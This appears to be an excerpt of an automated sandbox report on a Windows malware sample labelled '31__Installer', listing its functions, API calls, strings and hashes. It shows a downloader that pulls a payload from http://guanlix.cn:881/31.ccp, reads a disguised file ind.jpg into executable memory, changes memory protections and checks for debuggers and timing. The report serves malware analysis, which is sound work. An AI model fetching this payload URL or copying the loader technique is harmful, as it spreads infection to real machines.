InternetCloseHandle.WININET(?), ref: 003E2EF7

Strings

Download, xrefs: 003E2E59

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: cc5ce7350fdabb6c54d298e593daa8550817490fa27907306dfae096143f9a30
Instruction ID: aa5b63c0f53fc9115369c9925386374f2a3b0bec72ff4ab52619a828516f5aa0
Opcode Fuzzy Hash: cc5ce7350fdabb6c54d298e593daa8550817490fa27907306dfae096143f9a30
Instruction Fuzzy Hash: ED21077190016AEEEF229BA5CC85FFFBB7CFB44354F10026AB615B6191D7705E84CA60

Function 003E2E3D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 003E2E42
InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003E2E5E
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003E2E7B
InternetCloseHandle.WININET(?), ref: 003E2F0F

Part of subcall function 003E2D13: __EH_prolog.LIBCMT ref: 003E2D18

InternetReadFile.WININET(?,?,00001000,?), ref: 003E2EE1
InternetCloseHandle.WININET(?), ref: 003E2EF7

Strings

Download, xrefs: 003E2E59

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: Internet$CloseH_prologHandleOpen$FileRead
String ID: Download
API String ID: 2208602198-2171396134
Opcode ID: 85e0e1c085c2ff7f50010a827a411439e79386e6a6ecabd344ea70bb7c11a141
Instruction ID: 0ad24c5e498228a5182fd22fb4b892713f6bc98fd7a5214afa9c09dba61596a7
Opcode Fuzzy Hash: 85e0e1c085c2ff7f50010a827a411439e79386e6a6ecabd344ea70bb7c11a141
Instruction Fuzzy Hash: A111FC75900169EFEB229B95CC85FFEBB7CEB48354F10026AB605B61D1C7705E44CA60

Function 02F9FFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,00000002,?,02F9FCB5,00000000), ref: 02F9FFF5
VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,02F9FCB5,00000000), ref: 02FA0035
VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 02FA0068
VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 02FA0093
VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 02FA00BD

Memory Dump Source

Source File: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_31__Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction ID: 8996282749396dc4f0aabc5bed4e49d75b2ba13970d391f932207adc2f6038c1
Opcode Fuzzy Hash: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
Instruction Fuzzy Hash: 0D21AFF260530A7FD3209A649C99F7B77ECEF84746F04483EBB46D2550EF64E5088A60

Function 003E2964 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 003E2964
_Fputc.LIBCPMT ref: 003E29C9
_Fputc.LIBCPMT ref: 003E2A9F

Strings

, xrefs: 003E2A76

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: Fputc$H_prolog
String ID:
API String ID: 1896196775-3916222277
Opcode ID: 2aeda205b46232bdffd482e0606d86d76d8b906a7ed6fdf26bf36797777554db
Instruction ID: e1196e1c74451b4257ce835c077a44ea124d09794912932c1f9a8c060ad99ade
Opcode Fuzzy Hash: 2aeda205b46232bdffd482e0606d86d76d8b906a7ed6fdf26bf36797777554db
Instruction Fuzzy Hash: 87419F319016A9DFCF26CB96C940AAFB7F9BF58310F21072AF442A76C1DB71A944CB51

Function 02FA00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(00000000,000016CC,00000040,?), ref: 02FA011B
VirtualProtect.KERNEL32(00000000,000016CC,?,?), ref: 02FA014E
VirtualProtect.KERNEL32(00000000,00402AD1,00000040,?), ref: 02FA0179
VirtualProtect.KERNEL32(00000000,00402AD1,?,?), ref: 02FA01A3

Memory Dump Source

Source File: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_31__Installer.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction ID: e79b56432533bd26ee309828861b4d28eb68591973aade877d693839bc6d5f25
Opcode Fuzzy Hash: 1e70e2575075489d053cc6fb2dca748f7a53306e9098dcd260615f23523f6c56
Instruction Fuzzy Hash: 212192B26147496FF3209A65DC98F7B77ECDB88340F44083EBB87D2541EF64E4058A60

Function 003E2F22 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003E1186: __time64.LIBCMT ref: 003E118E
Part of subcall function 003E1186: _rand.LIBCMT ref: 003E119E
Part of subcall function 003E1186: _rand.LIBCMT ref: 003E11AD

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 003E2F33

Part of subcall function 003E2E3D: __EH_prolog.LIBCMT ref: 003E2E42
Part of subcall function 003E2E3D: InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 003E2E5E
Part of subcall function 003E2E3D: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 003E2E7B
Part of subcall function 003E2E3D: InternetReadFile.WININET(?,?,00001000,?), ref: 003E2EE1
Part of subcall function 003E2E3D: InternetCloseHandle.WININET(?), ref: 003E2EF7
Part of subcall function 003E2E3D: InternetCloseHandle.WININET(?), ref: 003E2F0F

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 003E2F54

Part of subcall function 003E168B: _wprintf.LIBCMT ref: 003E169D
Part of subcall function 003E168B: _wprintf.LIBCMT ref: 003E16B5
Part of subcall function 003E168B: _wprintf.LIBCMT ref: 003E16CA

Part of subcall function 003E11E1: GetTickCount64.KERNEL32 ref: 003E11EF
Part of subcall function 003E11E1: Sleep.KERNEL32(0000012C), ref: 003E11F9
Part of subcall function 003E11E1: GetTickCount64.KERNEL32 ref: 003E11FF
Part of subcall function 003E11E1: CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 003E1244
Part of subcall function 003E11E1: GetFileSize.KERNEL32(00000000,00000000), ref: 003E124E
Part of subcall function 003E11E1: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 003E125F
Part of subcall function 003E11E1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003E1270
Part of subcall function 003E11E1: CloseHandle.KERNEL32(00000000), ref: 003E1277

Strings

http://guanlix.cn:881/31.ccp, xrefs: 003E2F3E
C:\Users\Public\Downloads\ind.jpg, xrefs: 003E2F39

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: Internet$File$CloseHandleVirtual_wprintf$AllocCount64OpenReadTick_rand$CreateFreeH_prologSizeSleep__time64
String ID: C:\Users\Public\Downloads\ind.jpg$http://guanlix.cn:881/31.ccp
API String ID: 1108426195-1162759939
Opcode ID: 4450c629c59c6dfc00457764a5dad1144584269356b2c9ba36a59ae04490f5dc
Instruction ID: 91353c9b92baabdcc0c7330bffa6fdcd5820aad0df335480e5568d9f2b9117f8
Opcode Fuzzy Hash: 4450c629c59c6dfc00457764a5dad1144584269356b2c9ba36a59ae04490f5dc
Instruction Fuzzy Hash: 42E012712442B07AF66773B16C0BFEB16189B00751F214512F7009D0D1DDE46941C669

Function 02F9FB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02F9FB8F
LoadLibraryA.KERNEL32(00000238), ref: 02F9FC2C

Memory Dump Source

Source File: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f90000_31__Installer.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction ID: bc6210992e627c1b0f640fc3387eba4c03cc92839aca1e5b08ff1a1cb3e45ae2
Opcode Fuzzy Hash: 51126b6fd836e9861d18a340eaab34de8d787920e2fff5e274c72b92ada8e67f
Instruction Fuzzy Hash: D161E372901B06ABEF315A68CC90F9BB3EAFF05398F140A1AE75A85940D731F155CF51

Function 003E5902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003EA8EB: __getptd_noexit.LIBCMT ref: 003EA8EB

__lock_file.LIBCMT ref: 003E5949

Part of subcall function 003E50E4: __lock.LIBCMT ref: 003E5109

__fclose_nolock.LIBCMT ref: 003E5954

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 121e443a4353b667bdaceebb9451c143ecab2b4438bcfadc00dfe0e7145b2611
Instruction ID: ab30a30c18d9660e7fad848df10d405633a23f7ae17bb484dbf3bc5ee1e1049f
Opcode Fuzzy Hash: 121e443a4353b667bdaceebb9451c143ecab2b4438bcfadc00dfe0e7145b2611
Instruction Fuzzy Hash: D5F09630801FB9DADB13AB7688467EE7BA06F01339F258305F435AE1D2C77C5D019A56

Function 054675E0 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71043936b631f00eb95faf575370b20b6c0653bc6d9813c7faf95eaab74d5af
Instruction ID: 4721e104eafd0775cf57e6eaf8ebcdfe9a8e426526d662dfa2eb92d44c549efc
Opcode Fuzzy Hash: d71043936b631f00eb95faf575370b20b6c0653bc6d9813c7faf95eaab74d5af
Instruction Fuzzy Hash: 4741F231D0434A8BCB14DFAAD8447DABBF5EF89220F14856AD409A7340DB789881CBD1

Function 003E1830 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memmove.LIBCMT ref: 003E188D

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: b31e1f9b03b365c2f3d260a60de42dfc28d177028125769d53eafa99e593f33c
Instruction ID: 8344e04f912839286dbaea72a2cfb8f0712e8fb3d6f822f0cf474706828e6e1b
Opcode Fuzzy Hash: b31e1f9b03b365c2f3d260a60de42dfc28d177028125769d53eafa99e593f33c
Instruction Fuzzy Hash: 5D313C759002A9EFCB52CF5AC88459D77B4FF05364F14836AE8248B191D3709E50CF81

Function 05467041 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05467632), ref: 0546771F

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 0d4a3b77cd75d55d17bfc073a4ec5afa301f29073c9480ec8871d726b4c80b23
Instruction ID: 0f6e6ec8dcbbcbc78186437cdd0d32306179afbefc0c50ba189db6f7bc3ba95d
Opcode Fuzzy Hash: 0d4a3b77cd75d55d17bfc073a4ec5afa301f29073c9480ec8871d726b4c80b23
Instruction Fuzzy Hash: E6211571C0465A9FCB10DFAAD444BDEFBF4EB48624F15816AD818A7240D378A9448FA2

Function 003E2D13 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E2D18

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d47b2aba60c88302d93b92d667a2981f5dd996becaf098e873be582f41e7fa1c
Instruction ID: 2626a25b3e38deb3a4dca87769e670d5b5db13bf2ef261f58838c772de717b08
Opcode Fuzzy Hash: d47b2aba60c88302d93b92d667a2981f5dd996becaf098e873be582f41e7fa1c
Instruction Fuzzy Hash: CE116DB5610258AFDB12DF8AC885AAFF7ECFF54344B00451EF552AB281C3B09D01CB60

Function 003E2D18 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E2D18

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9881b6aeff50cce0562cf9cb9c7315f958a8aba2477b941a501b337196116aed
Instruction ID: a86d7b201a7b420da801ef489a457c3f0b037d99b8463cde092321bcca6e863e
Opcode Fuzzy Hash: 9881b6aeff50cce0562cf9cb9c7315f958a8aba2477b941a501b337196116aed
Instruction Fuzzy Hash: 5D116DB5610258AFDB12DF8AC885AAFF7ECFB54344B00451EF552AB281C3B09D01CB60

Function 054676B0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05467632), ref: 0546771F

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 3981c1bbf3177377ef56de5805accb92f11aefb3d7fa415df9d8b46a97964ffc
Instruction ID: ec32651ea26f59b9ee9c315129728f0c04a6853c00b3af0de39be8503d8e0200
Opcode Fuzzy Hash: 3981c1bbf3177377ef56de5805accb92f11aefb3d7fa415df9d8b46a97964ffc
Instruction Fuzzy Hash: C41144B1C0065A9BCB10CFAAC4447DEFBF4FF48220F14812AD818B7640D7B8A940CFA1

Function 05466F64 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,05467632), ref: 0546771F

Memory Dump Source

Source File: 00000000.00000002.3821009718.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5460000_31__Installer.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 618a65fee4f61b0aaf868ae65724b5f0018be0e55b910a1d36a8de38f8708cc7
Instruction ID: f69bea27d311674d64264d8e8e9eccf8bc0b589a33f0fab2756325daa64dab46
Opcode Fuzzy Hash: 618a65fee4f61b0aaf868ae65724b5f0018be0e55b910a1d36a8de38f8708cc7
Instruction Fuzzy Hash: 691133B1C0465A9BCB10CFAAC4447DEFBF4EB48620F10812AE918A7240D378A940CFE1

Function 003E246D Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E246D

Part of subcall function 003E130B: std::locale::facet::_Incref.LIBCPMT ref: 003E131E

Part of subcall function 003E2344: __EH_prolog.LIBCMT ref: 003E2349
Part of subcall function 003E2344: std::_Lockit::_Lockit.LIBCPMT ref: 003E2358
Part of subcall function 003E2344: int.LIBCPMT ref: 003E236F

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: 2d5285a6f7b0454f63ad014ddca2fc5967f2237b946529e9e2b63b75815453c0
Instruction ID: 21c62721c7ed326823eb534c2d4b15ed6ec629a0fbd369aa7ee8d96f711b19d9
Opcode Fuzzy Hash: 2d5285a6f7b0454f63ad014ddca2fc5967f2237b946529e9e2b63b75815453c0
Instruction Fuzzy Hash: FFF096716001F4ABDF17EF16CC02B9F339D6B14700F004619F406D61C1DFB499108B50

Function 003E2468 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003E246D

Part of subcall function 003E130B: std::locale::facet::_Incref.LIBCPMT ref: 003E131E

Part of subcall function 003E2344: __EH_prolog.LIBCMT ref: 003E2349
Part of subcall function 003E2344: std::_Lockit::_Lockit.LIBCPMT ref: 003E2358
Part of subcall function 003E2344: int.LIBCPMT ref: 003E236F

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: cdfe25ac972e8610f28b07970a584f2a886e07f90aaebbf6406479b55b5710ac
Instruction ID: 77697ad41090e870ca707962eab7878a44153d247643da9f12351c85073f258d
Opcode Fuzzy Hash: cdfe25ac972e8610f28b07970a584f2a886e07f90aaebbf6406479b55b5710ac
Instruction Fuzzy Hash: 90F09675A001F8ABDF17EF56CC02BAE335DAB14700F004619F406DA1D1DFB499108B50

Function 02FED5FC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3819556713.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fed000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd9a0abd4c93e75dc5735e4e085c41be4bcf404edf4f293e663832bbfd7d0d4f
Instruction ID: 2a281c6b626a52dfb26648fa6d794d8ccb7f675ca269e996e581ac757d4858dc
Opcode Fuzzy Hash: dd9a0abd4c93e75dc5735e4e085c41be4bcf404edf4f293e663832bbfd7d0d4f
Instruction Fuzzy Hash: F62103B6604204DFDF06DF10D9C4B26BB6AFB98364F248569DA0E0B646C336D456CBA2

Function 02FED5F7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3819556713.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fed000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f85c9119a2a05271a25a2fe596ba4b1c120649c3b9cd223038ffdfc533407fe
Instruction ID: 277702edc097cef73316b9bb3f769ddb5c04bc9f935e85e790c93df02df39327
Opcode Fuzzy Hash: 0f85c9119a2a05271a25a2fe596ba4b1c120649c3b9cd223038ffdfc533407fe
Instruction Fuzzy Hash: D611B1B6904244CFCF06DF10D5C4B16BF62FB84324F24C5A9D9490B656C33AD456CFA2

Function 02FED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3819556713.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fed000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a625294331df3cb3d4c15cb47ee3efc466f49b95635f115cd27f1da3d239686
Instruction ID: dda55bb7c3d609669d1bf85285ec5303f5a7e641f61c92d0d30ce824f0d817c8
Opcode Fuzzy Hash: 4a625294331df3cb3d4c15cb47ee3efc466f49b95635f115cd27f1da3d239686
Instruction Fuzzy Hash: EC01F7715083049AEB114A25CC84B67BF8CDF41AA5F1CC01ADF1A4B946C7799441C7B2

Function 02FED005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3819556713.0000000002FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fed000_31__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00fa5845a21e4dc0857642ab846c50e7a862d38e7bdb0822928311867b811d10
Instruction ID: 6a274d1baedce407557eb57e4868c97af8acca48e1ca7d3d8a5f3e9bb5a1800c
Opcode Fuzzy Hash: 00fa5845a21e4dc0857642ab846c50e7a862d38e7bdb0822928311867b811d10
Instruction Fuzzy Hash: 5B014C6140E3C09FD7128B258894B52BFB8DF53624F1D81DBD9888F1A7C2695849C772

Non-executed Functions

Function 003EF45D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,003EFA9A,?,003E6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 003EF49C
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,003EFA9A,?,003E6AFC,?,000000BC,?,00000001,00000000,00000000), ref: 003EF4C5
GetACP.KERNEL32(?,?,003EFA9A,?,003E6AFC,?,000000BC,?,00000001,00000000), ref: 003EF4D9

Strings

ACP, xrefs: 003EF46C
OCP, xrefs: 003EF47D

Memory Dump Source

Source File: 00000000.00000002.3815740941.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000000.00000002.3815678950.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815836071.00000000003F9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815876227.00000000003FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e0000_31__Installer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: fd2ce640451c9211457163b539f841f6175a876922ec4fb83917cfa2dea53039
Instruction ID: 661788fe378a8f918fd1a9943e7a8f85ebc15123883522835fa4558f74378641
Opcode Fuzzy Hash: fd2ce640451c9211457163b539f841f6175a876922ec4fb83917cfa2dea53039
Instruction Fuzzy Hash: 4001883160166BBEEB139B63DC06B6B76ACAF01369F214635F505E50D1EBA0CA41CA54

Function 003E65D1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 003EDF93
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003EDFA8
UnhandledExceptionFilter.KERNEL32(003FAEE0), ref: 003EDFB3
GetCurrentProcess.KERNEL32(C0000409), ref: 003EDFCF
TerminateProcess.KERNEL32(00000000), ref: 003EDFD6

Memory Dump Source

